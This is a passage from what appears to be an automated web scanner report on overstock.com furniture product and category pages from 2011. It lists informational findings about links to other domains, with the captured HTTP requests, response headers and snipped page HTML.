<img src="http://ak2.ostkcdn.com/img/mxc/08-icon_payPal.gif" title="PapPal" />
<dd>
...[SNIP]...
pture-content/fetch?hash=GD829B8P&amp;content=/bmlweb/os_tnpupto6mnomin500rollingiw.html ','BMLPopUp','width=550,height=500,resizable=yes,menubar=yes,location=yes,status=yes,scrollbars=yes')" href="#"><img src="http://ak2.ostkcdn.com/img/mxc/08-icon_BML.gif" title="BillMeLater" /></a>
...[SNIP]...
<dl>
<img border="0" alt="" alt="Overstock.com MasterCard Card" src="http://ak2.ostkcdn.com/img/mxc/2010-CB_CreditCardIcon-med.gif"><h3 class="heading">
...[SNIP]...
</span><img src="http://ak2.ostkcdn.com/img/mxc/stars4_5.gif" alt="" />
</div>
...[SNIP]...
<p>Rating <img id="starImage1" src="http://ak2.ostkcdn.com/img/mxc/stars5_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage2" src="http://ak2.ostkcdn.com/img/mxc/stars3_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage3" src="http://ak2.ostkcdn.com/img/mxc/stars5_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage4" src="http://ak2.ostkcdn.com/img/mxc/stars3_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage5" src="http://ak2.ostkcdn.com/img/mxc/stars3_0.gif" alt="" /></p>
...[SNIP]...
<!-- id="bd" -->


<script language="JavaScript" src="http://ak2.ostkcdn.com/js/s_code.js" type='text/javascript'></script>
...[SNIP]...
<li><a href="http://www.facebook.com/Overstockdotcom" target="_blank"><i class="facebook">
...[SNIP]...
<li><a href="http://twitter.com/overstock" target="_blank"><i class="twitter">
...[SNIP]...
<li><a href="http://www.o.biz?TID=FOOT:RS:OBIZ" target="_blank">O.biz</a>
...[SNIP]...
<li><a href="http://www.eziba.com?TID=FOOT:RS:EZIBA" target="_blank">Eziba.com</a>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1787227;type=count546;cat=produ835;u1=12084670;ord=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
<!-- PERMUTO PRODUCT PAGE PIXEL -->
<script type="text/javascript"
src="http://img.pulsemgr.com/script/pm/100/">
</script>
...[SNIP]...

5.7. http://www.overstock.com/Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html?TID=R:A2_6 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:30:42 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:30:42 GMT
Pragma: no-cache
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5203264|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:30:42 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:30:42 GMT; Path=/
Keep-Alive: timeout=5, max=71
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 120204

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
.org/ratingsv02.html" l gen true for "http://www.overstock.com/" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.overstock.com/" r (n 0 s 0 v 0 l 0))'>

<link rel="shortcut icon" href="http://ak2.ostkcdn.com/favicon.ico">
<link rel="stylesheet" href="http://ak2.ostkcdn.com/css/os-master.1.2.2.min.css">
<!--[if IE]>
...[SNIP]...
<!--End Element SITE_HEAD_S -->


<link rel="stylesheet" type="text/css" href="http://ak2.ostkcdn.com/css/product-page.1.1.1.min.css" media="all">
<script language="JavaScript1.1" type="text/javascript" src="http://ak2.ostkcdn.com/js/ProductPageCommon.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ak2.ostkcdn.com/js/swfobject.js"></script>
<script type="text/javascript" src="http://ak2.ostkcdn.com/js/lib/os/overstock.1.5.2.min.js"></script>
...[SNIP]...
</script>
<script language='javascript' src='http://ak2.ostkcdn.com/js/sales_mtagconfig.js' type='text/javascript'> </script>


<link rel='SHORTCUT ICON' HREF='http://ak2.ostkcdn.com/favicon.ico'>


</head>
...[SNIP]...
<div class="checkOut" >
<img id="checkOutCartIcon" border="0" src="http://ak2.ostkcdn.com/img/mxc/spacer.gif">
<a id="checkoutLink" href="http://www.overstock.com/cart" rel="nofollow">
...[SNIP]...
<a href="http://www.overstock.com/cart" rel="nofollow">
<img id="checkoutButton" border="0" src="http://ak2.ostkcdn.com/img/mxc/spacer.gif" style="margin-left: 10px;">
</a>
...[SNIP]...
<a href="http://www.overstock.com/intlcountryselect"><img src="http://ak2.ostkcdn.com/img/mxc/20101020_us_flag.gif" /></a>
...[SNIP]...
</script>


<script type="text/javascript" src="http://ak2.ostkcdn.com/js/p13n.js"></script>
...[SNIP]...
<li><a href="http://www.facebook.com/sharer.php?u=[url]&t=[title]" title="Facebook" rel="facebook" target="_blank"><i class="facebook">
...[SNIP]...
<li><a href="http://twitter.com/home?status=[url]%20-%20[title]" title="Twitter" rel="twitter" target="_blank"><i class="twitter">
...[SNIP]...
<li><a href="http://www.google.com/bookmarks/mark?op=add&bkmk=[url]&title=[title]" title="Google" rel="google" target="_blank"><i class="google">
...[SNIP]...
<li><a href="http://www.myspace.com/Modules/PostTo/Pages/?u=[url]&t=[title]" title="Myspace" rel="myspace" target="_blank"><i class="myspace">
...[SNIP]...
<li><a href="https://skydrive.live.com/sharefavorite.aspx/.SharedFavorites??marklet=1&mkt=en-us&url=[url]&title=[title]" title="Live" rel="live" target="_blank"><i class="live">
...[SNIP]...
<li><a href="http://digg.com/submit?phase=2&url=[url]&amp;title=[title]" title="Digg" rel="digg" target="_blank"><i class="digg">
...[SNIP]...
<li><a href="http://del.icio.us/post?v=4&amp;noui&amp;jump=close&amp;url=[url]&title=[title]" title="Delicious" rel="delicious" target="_blank"><i class="delicious">
...[SNIP]...
<li><a href="http://reddit.com/submit?url=[url]&title=[title]" title="Reddit" rel="reddit" target="_blank"><i class="reddit">
...[SNIP]...
<li><a href="http://www.blogger.com/blog_this.pyra?u=[url]&t=[title]" title="Blogger" rel="blogger" target="_blank"><i class="blogger">
...[SNIP]...
<div id="prodMain_imgGallery" class="col6span2">
<link rel="stylesheet" type="text/css" href="http://ak2.ostkcdn.com/css/productPageImgGallery.css"/>

<!-- ZONE - ImageGallery - BEGIN -->
...[SNIP]...
<div id="galleryImage" class="noZoom">

<img style="display: block;" onclick="return viewLarger();" id="activeImage"
src="http://ak2.ostkcdn.com/images/products/P13034205.jpg"
alt="Black Linen Slipper Chair with Signature Pillow"


width='250'

border="0"
onLoad="CheckSize(this)"
/>


</div>
...[SNIP]...
<li class="active" id="node1">

<a onclick="return viewLarger();" onmouseover="return showPicture(this, false,false)" title="Black Linen Slipper Chair with Signature Pillow" href="http://ak1.ostkcdn.com/images/products/P13034205.jpg">
<img height='72' name="proimg" id="image" class="sizedProdImage" src="http://ak1.ostkcdn.com/images/products/P13034205.jpg" >

</a>
...[SNIP]...
<li>
<a onclick="return viewLarger();" onmouseover="return showPicture(this, false, false)" href="http://ak1.ostkcdn.com/images/products/MLA13034205.jpg" >
<img height="72" src="http://ak2.ostkcdn.com/images/products/MLA13034205.jpg" alt="Black Linen Slipper Chair with Signature Pillow" >
</a>
...[SNIP]...
<li>
<a onclick="return viewLarger();" onmouseover="return showPicture(this, false, false)" href="http://ak1.ostkcdn.com/images/products/MLB13034205.jpg">
<img height="72" src="http://ak1.ostkcdn.com/images/products/MLB13034205.jpg" alt="Black Linen Slipper Chair with Signature Pillow">
</a>
...[SNIP]...
</span>

<img id="starImage" alt="Overall Rating" src="http://ak2.ostkcdn.com/img/mxc/stars5_0.gif">

<a id="showAllReviewsLink" title="Read Reviews" href="http://www.overstock.com/Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/customer-reviews.html">
...[SNIP]...
<dl>
<img src='http://ak2.ostkcdn.com/img/mxc/20090714_cc+logos.gif' border='0' alt=''><h3 class="heading">
...[SNIP]...
</ul>
<img src="http://ak2.ostkcdn.com/img/mxc/08-icon_payPal.gif" title="PapPal" />
<dd>
...[SNIP]...
pture-content/fetch?hash=GD829B8P&amp;content=/bmlweb/os_tnpupto6mnomin500rollingiw.html ','BMLPopUp','width=550,height=500,resizable=yes,menubar=yes,location=yes,status=yes,scrollbars=yes')" href="#"><img src="http://ak2.ostkcdn.com/img/mxc/08-icon_BML.gif" title="BillMeLater" /></a>
...[SNIP]...
<dl>
<img border="0" alt="" alt="Overstock.com MasterCard Card" src="http://ak2.ostkcdn.com/img/mxc/2010-CB_CreditCardIcon-med.gif"><h3 class="heading">
...[SNIP]...
</span><img src="http://ak2.ostkcdn.com/img/mxc/stars5_0.gif" alt="" />
</div>
...[SNIP]...
<p>Rating <img id="starImage1" src="http://ak2.ostkcdn.com/img/mxc/stars5_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage2" src="http://ak2.ostkcdn.com/img/mxc/stars5_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage3" src="http://ak2.ostkcdn.com/img/mxc/stars5_0.gif" alt="" /></p>
...[SNIP]...
<div class="OverallR">&nbsp;&nbsp;&nbsp;Rating: <img id="starImage" src="http://ak2.ostkcdn.com/img/mxc/stars5_0.gif">
<span id="ratingFinal4">
...[SNIP]...
<!-- id="bd" -->


<script language="JavaScript" src="http://ak2.ostkcdn.com/js/s_code.js" type='text/javascript'></script>
...[SNIP]...
<li><a href="http://www.facebook.com/Overstockdotcom" target="_blank"><i class="facebook">
...[SNIP]...
<li><a href="http://twitter.com/overstock" target="_blank"><i class="twitter">
...[SNIP]...
<li><a href="http://www.o.biz?TID=FOOT:RS:OBIZ" target="_blank">O.biz</a>
...[SNIP]...
<li><a href="http://www.eziba.com?TID=FOOT:RS:EZIBA" target="_blank">Eziba.com</a>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1787227;type=count546;cat=produ835;u1=13034205;ord=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
<!-- PERMUTO PRODUCT PAGE PIXEL -->
<script type="text/javascript"
src="http://img.pulsemgr.com/script/pm/100/">
</script>
...[SNIP]...

5.8. http://www.overstock.com/Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html?IID=prod5203264&sec_iid=74074 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:31:32 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:31:32 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/|mxcclickele^74074; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=5203264|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:31:32 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:31:32 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=51
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 120311

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
.org/ratingsv02.html" l gen true for "http://www.overstock.com/" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.overstock.com/" r (n 0 s 0 v 0 l 0))'>

<link rel="shortcut icon" href="http://ak1.ostkcdn.com/favicon.ico">
<link rel="stylesheet" href="http://ak1.ostkcdn.com/css/os-master.1.2.2.min.css">
<!--[if IE]>
...[SNIP]...
<!--End Element SITE_HEAD_S -->


<link rel="stylesheet" type="text/css" href="http://ak1.ostkcdn.com/css/product-page.1.1.1.min.css" media="all">
<script language="JavaScript1.1" type="text/javascript" src="http://ak1.ostkcdn.com/js/ProductPageCommon.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ak1.ostkcdn.com/js/swfobject.js"></script>
<script type="text/javascript" src="http://ak1.ostkcdn.com/js/lib/os/overstock.1.5.2.min.js"></script>
...[SNIP]...
</script>
<script language='javascript' src='http://ak1.ostkcdn.com/js/sales_mtagconfig.js' type='text/javascript'> </script>


<link rel='SHORTCUT ICON' HREF='http://ak1.ostkcdn.com/favicon.ico'>


</head>
...[SNIP]...
<div class="checkOut" >
<img id="checkOutCartIcon" border="0" src="http://ak1.ostkcdn.com/img/mxc/spacer.gif">
<a id="checkoutLink" href="http://www.overstock.com/cart" rel="nofollow">
...[SNIP]...
<a href="http://www.overstock.com/cart" rel="nofollow">
<img id="checkoutButton" border="0" src="http://ak1.ostkcdn.com/img/mxc/spacer.gif" style="margin-left: 10px;">
</a>
...[SNIP]...
<a href="http://www.overstock.com/intlcountryselect"><img src="http://ak1.ostkcdn.com/img/mxc/20101020_us_flag.gif" /></a>
...[SNIP]...
</script>


<script type="text/javascript" src="http://ak2.ostkcdn.com/js/p13n.js"></script>
...[SNIP]...
<li><a href="http://www.facebook.com/sharer.php?u=[url]&t=[title]" title="Facebook" rel="facebook" target="_blank"><i class="facebook">
...[SNIP]...
<li><a href="http://twitter.com/home?status=[url]%20-%20[title]" title="Twitter" rel="twitter" target="_blank"><i class="twitter">
...[SNIP]...
<li><a href="http://www.google.com/bookmarks/mark?op=add&bkmk=[url]&title=[title]" title="Google" rel="google" target="_blank"><i class="google">
...[SNIP]...
<li><a href="http://www.myspace.com/Modules/PostTo/Pages/?u=[url]&t=[title]" title="Myspace" rel="myspace" target="_blank"><i class="myspace">
...[SNIP]...
<li><a href="https://skydrive.live.com/sharefavorite.aspx/.SharedFavorites??marklet=1&mkt=en-us&url=[url]&title=[title]" title="Live" rel="live" target="_blank"><i class="live">
...[SNIP]...
<li><a href="http://digg.com/submit?phase=2&url=[url]&amp;title=[title]" title="Digg" rel="digg" target="_blank"><i class="digg">
...[SNIP]...
<li><a href="http://del.icio.us/post?v=4&amp;noui&amp;jump=close&amp;url=[url]&title=[title]" title="Delicious" rel="delicious" target="_blank"><i class="delicious">
...[SNIP]...
<li><a href="http://reddit.com/submit?url=[url]&title=[title]" title="Reddit" rel="reddit" target="_blank"><i class="reddit">
...[SNIP]...
<li><a href="http://www.blogger.com/blog_this.pyra?u=[url]&t=[title]" title="Blogger" rel="blogger" target="_blank"><i class="blogger">
...[SNIP]...
<div id="prodMain_imgGallery" class="col6span2">
<link rel="stylesheet" type="text/css" href="http://ak1.ostkcdn.com/css/productPageImgGallery.css"/>

<!-- ZONE - ImageGallery - BEGIN -->
...[SNIP]...
<div id="galleryImage" class="noZoom">

<img style="display: block;" onclick="return viewLarger();" id="activeImage"
src="http://ak1.ostkcdn.com/images/products/P13034205.jpg"
alt="Black Linen Slipper Chair with Signature Pillow"


width='250'

border="0"
onLoad="CheckSize(this)"
/>


</div>
...[SNIP]...
<li class="active" id="node1">

<a onclick="return viewLarger();" onmouseover="return showPicture(this, false,false)" title="Black Linen Slipper Chair with Signature Pillow" href="http://ak2.ostkcdn.com/images/products/P13034205.jpg">
<img height='72' name="proimg" id="image" class="sizedProdImage" src="http://ak2.ostkcdn.com/images/products/P13034205.jpg" >

</a>
...[SNIP]...
<li>
<a onclick="return viewLarger();" onmouseover="return showPicture(this, false, false)" href="http://ak2.ostkcdn.com/images/products/MLA13034205.jpg" >
<img height="72" src="http://ak1.ostkcdn.com/images/products/MLA13034205.jpg" alt="Black Linen Slipper Chair with Signature Pillow" >
</a>
...[SNIP]...
<li>
<a onclick="return viewLarger();" onmouseover="return showPicture(this, false, false)" href="http://ak2.ostkcdn.com/images/products/MLB13034205.jpg">
<img height="72" src="http://ak1.ostkcdn.com/images/products/MLB13034205.jpg" alt="Black Linen Slipper Chair with Signature Pillow">
</a>
...[SNIP]...
</span>

<img id="starImage" alt="Overall Rating" src="http://ak1.ostkcdn.com/img/mxc/stars5_0.gif">

<a id="showAllReviewsLink" title="Read Reviews" href="http://www.overstock.com/Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/customer-reviews.html">
...[SNIP]...
<dl>
<img src='http://ak1.ostkcdn.com/img/mxc/20090714_cc+logos.gif' border='0' alt=''><h3 class="heading">
...[SNIP]...
</ul>
<img src="http://ak1.ostkcdn.com/img/mxc/08-icon_payPal.gif" title="PapPal" />
<dd>
...[SNIP]...
pture-content/fetch?hash=GD829B8P&amp;content=/bmlweb/os_tnpupto6mnomin500rollingiw.html ','BMLPopUp','width=550,height=500,resizable=yes,menubar=yes,location=yes,status=yes,scrollbars=yes')" href="#"><img src="http://ak1.ostkcdn.com/img/mxc/08-icon_BML.gif" title="BillMeLater" /></a>
...[SNIP]...
<dl>
<img border="0" alt="" alt="Overstock.com MasterCard Card" src="http://ak1.ostkcdn.com/img/mxc/2010-CB_CreditCardIcon-med.gif"><h3 class="heading">
...[SNIP]...
</span><img src="http://ak1.ostkcdn.com/img/mxc/stars5_0.gif" alt="" />
</div>
...[SNIP]...
<p>Rating <img id="starImage1" src="http://ak1.ostkcdn.com/img/mxc/stars5_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage2" src="http://ak1.ostkcdn.com/img/mxc/stars5_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage3" src="http://ak1.ostkcdn.com/img/mxc/stars5_0.gif" alt="" /></p>
...[SNIP]...
<div class="OverallR">&nbsp;&nbsp;&nbsp;Rating: <img id="starImage" src="http://ak1.ostkcdn.com/img/mxc/stars5_0.gif">
<span id="ratingFinal4">
...[SNIP]...
<!-- id="bd" -->


<script language="JavaScript" src="http://ak1.ostkcdn.com/js/s_code.js" type='text/javascript'></script>
...[SNIP]...
<li><a href="http://www.facebook.com/Overstockdotcom" target="_blank"><i class="facebook">
...[SNIP]...
<li><a href="http://twitter.com/overstock" target="_blank"><i class="twitter">
...[SNIP]...
<li><a href="http://www.o.biz?TID=FOOT:RS:OBIZ" target="_blank">O.biz</a>
...[SNIP]...
<li><a href="http://www.eziba.com?TID=FOOT:RS:EZIBA" target="_blank">Eziba.com</a>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1787227;type=count546;cat=produ835;u1=13034205;ord=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
<!-- PERMUTO PRODUCT PAGE PIXEL -->
<script type="text/javascript"
src="http://img.pulsemgr.com/script/pm/100/">
</script>
...[SNIP]...

5.9. http://www.overstock.com/Home-Garden/Chairs/2737/subcat.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Chairs/2737/subcat.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Home-Garden/Chairs/2737/subcat.html?TID=R:MOD_A2 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:45 GMT
Server: Apache
Set-Cookie: SSLB=A; path=/; domain=www.overstock.com; expires=Mon, 14-Mar-2011 16:33:45 GMT
Set-Cookie: SSID=AwA56CkAAAAAPbVWTfySCQE9tVZNAQA9tVZNAAAAAGlDfk09tVZNAQDsAAAAhA4AAAM; path=/; domain=www.overstock.com; expires=Sun, 12-Feb-2012 16:28:45 GMT
Set-Cookie: SSSC=2.G5572840862532604668.1.236.3716; path=/; domain=www.overstock.com
Set-Cookie: SSRT=PbVWTQE; path=/; domain=www.overstock.com; expires=Sun, 12-Feb-2012 16:28:45 GMT
Expires: Thu, 20 May 2010 20:50:16 GMT
Pragma: no-cache
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Content-Type: text/html;charset=iso-8859-1
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:45 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^Home-Garden/Chairs/2737/subcat.html|searchhistory^categories; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Sitespect: true
Keep-Alive: timeout=5, max=197
Connection: Keep-Alive
Content-Length: 248320

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
.org/ratingsv02.html" l gen true for "http://www.overstock.com/" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.overstock.com/" r (n 0 s 0 v 0 l 0))'>

<link rel="shortcut icon" href="http://ak1.ostkcdn.com/favicon.ico">
<link rel="stylesheet" href="http://ak1.ostkcdn.com/css/os-master.1.2.2.min.css">
<!--[if IE]>
...[SNIP]...
<!-- PAGE_CSS_NAV: site element -->
<link rel="stylesheet" type="text/css" href="http://ak1.ostkcdn.com/css/search-nav.1.3.2.min.css">

<style type="text/css">
...[SNIP]...
<!-- /PAGE_CSS_NAV: site element -->
<script language='javascript' src='http://ak1.ostkcdn.com/js/sales_mtagconfig.js' type='text/javascript'> </script>


<link rel='SHORTCUT ICON' HREF='http://ak1.ostkcdn.com/favicon.ico'>


</head>
...[SNIP]...
<div class="checkOut" >
<img id="checkOutCartIcon" border="0" src="http://ak1.ostkcdn.com/img/mxc/spacer.gif">
<a id="checkoutLink" href="http://www.overstock.com/cart" rel="nofollow">
...[SNIP]...
<a href="http://www.overstock.com/cart" rel="nofollow">
<img id="checkoutButton" border="0" src="http://ak1.ostkcdn.com/img/mxc/spacer.gif" style="margin-left: 10px;">
</a>
...[SNIP]...
<a href="http://www.overstock.com/intlcountryselect"><img src="http://ak1.ostkcdn.com/img/mxc/20101020_us_flag.gif" /></a>
...[SNIP]...
<a title="Window Shopper" href="http://www.overstock.com/window-shopper?c=D-32"><img alt="Window Shopper" src="http://ak1.ostkcdn.com/img/mxc/20101029-window-shopper-furniture.jpg"></a>
...[SNIP]...
<li><a href="http://www.facebook.com/sharer.php?u=[url]&t=[title]" title="Facebook" rel="facebook" target="_blank"><i class="facebook">
...[SNIP]...
<li><a href="http://twitter.com/home?status=[url]%20-%20[title]" title="Twitter" rel="twitter" target="_blank"><i class="twitter">
...[SNIP]...
<li><a href="http://www.google.com/bookmarks/mark?op=add&bkmk=[url]&title=[title]" title="Google" rel="google" target="_blank"><i class="google">
...[SNIP]...
<li><a href="http://www.myspace.com/Modules/PostTo/Pages/?u=[url]&t=[title]" title="Myspace" rel="myspace" target="_blank"><i class="myspace">
...[SNIP]...
<li><a href="https://skydrive.live.com/sharefavorite.aspx/.SharedFavorites??marklet=1&mkt=en-us&url=[url]&title=[title]" title="Live" rel="live" target="_blank"><i class="live">
...[SNIP]...
<li><a href="http://digg.com/submit?phase=2&url=[url]&amp;title=[title]" title="Digg" rel="digg" target="_blank"><i class="digg">
...[SNIP]...
<li><a href="http://del.icio.us/post?v=4&amp;noui&amp;jump=close&amp;url=[url]&title=[title]" title="Delicious" rel="delicious" target="_blank"><i class="delicious">
...[SNIP]...
<li><a href="http://reddit.com/submit?url=[url]&title=[title]" title="Reddit" rel="reddit" target="_blank"><i class="reddit">
...[SNIP]...
<li><a href="http://www.blogger.com/blog_this.pyra?u=[url]&t=[title]" title="Blogger" rel="blogger" target="_blank"><i class="blogger">
...[SNIP]...
<a class="module" href="http://www.overstock.com/club-o/19492/static.html?TID=R:RIGHTCOLA">
<img src="http://ak1.ostkcdn.com/img/mxc/20101104_clubo_e.jpg" alt="Join Club O" />
</a>
...[SNIP]...
k.com/64567/static.html?uuidCode=WJW8WYK8N5Q4T&subAgentCode=017&cboffer=001&TID=R:RIGHTCOLB','cobrandcc','scrollbars=1,toolbar=1,location=1,statusbar=1,menubar=1,resizable=1,width=1024,height=800,');"><img src="http://ak2.ostkcdn.com/img/mxc/20101117_1X1cobranding.jpg" alt="Overstock.com MasterCard Card" /></a>

<a class="module" href="http://www.overstock.com/23288/static.html?TID=R:RIGHTCOLC">
<img src="http://ak1.ostkcdn.com/img/mxc/20100826_RN_D_omail.jpg" alt="Sign Up for Omail" />
</a>
...[SNIP]...
</p>


